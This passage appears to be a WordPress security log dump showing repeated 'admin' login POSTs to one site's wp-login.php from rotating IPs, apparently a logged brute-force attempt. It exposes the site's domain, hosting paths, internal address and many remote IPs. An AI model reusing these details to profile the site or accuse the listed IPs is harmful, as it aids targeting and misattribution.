Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36310\";s:11:\"REMOTE_ADDR\";s:13:\"54.37.137.204\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746909094.8941729;s:12:\"REQUEST_TIME\";i:1746909094;}}','54.37.137.204',0,'2025-05-11 02:01:36','1970-01-01 00:00:00'),(95361,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42836\";s:11:\"REMOTE_ADDR\";s:11:\"31.7.70.254\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746909530.6514421;s:12:\"REQUEST_TIME\";i:1746909530;}}','31.7.70.254',0,'2025-05-11 02:08:52','1970-01-01 00:00:00'),(95362,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34234\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.235.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746909965.4928601;s:12:\"REQUEST_TIME\";i:1746909965;}}','162.0.235.216',0,'2025-05-11 02:16:07','1970-01-01 00:00:00'),(95363,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48494\";s:11:\"REMOTE_ADDR\";s:15:\"170.187.185.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746910394.311286;s:12:\"REQUEST_TIME\";i:1746910394;}}','170.187.185.171',0,'2025-05-11 02:23:16','1970-01-01 00:00:00'),(95364,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38222\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746910821.4919059;s:12:\"REQUEST_TIME\";i:1746910821;}}','198.54.114.18',0,'2025-05-11 02:30:23','1970-01-01 00:00:00'),(95365,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56422\";s:11:\"REMOTE_ADDR\";s:11:\"81.71.88.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746911237.352706;s:12:\"REQUEST_TIME\";i:1746911237;}}','81.71.88.89',0,'2025-05-11 02:37:19','1970-01-01 00:00:00'),(95366,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33086\";s:11:\"REMOTE_ADDR\";s:14:\"87.248.139.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746911645.0088241;s:12:\"REQUEST_TIME\";i:1746911645;}}','87.248.139.173',0,'2025-05-11 02:44:06','1970-01-01 00:00:00'),(95367,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"18792\";s:11:\"REMOTE_ADDR\";s:13:\"185.88.153.48\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746912043.456974;s:12:\"REQUEST_TIME\";i:1746912043;}}','185.88.153.48',0,'2025-05-11 02:50:45','1970-01-01 00:00:00'),(95368,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38960\";s:11:\"REMOTE_ADDR\";s:13:\"199.188.201.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746912447.0824289;s:12:\"REQUEST_TIME\";i:1746912447;}}','199.188.201.3',0,'2025-05-11 02:57:28','1970-01-01 00:00:00'),(95369,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33536\";s:11:\"REMOTE_ADDR\";s:13:\"103.72.97.210\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746912843.56387;s:12:\"REQUEST_TIME\";i:1746912843;}}','103.72.97.210',0,'2025-05-11 03:04:05','1970-01-01 00:00:00'),(95370,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57128\";s:11:\"REMOTE_ADDR\";s:13:\"63.250.38.202\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746913244.227916;s:12:\"REQUEST_TIME\";i:1746913244;}}','63.250.38.202',0,'2025-05-11 03:10:45','1970-01-01 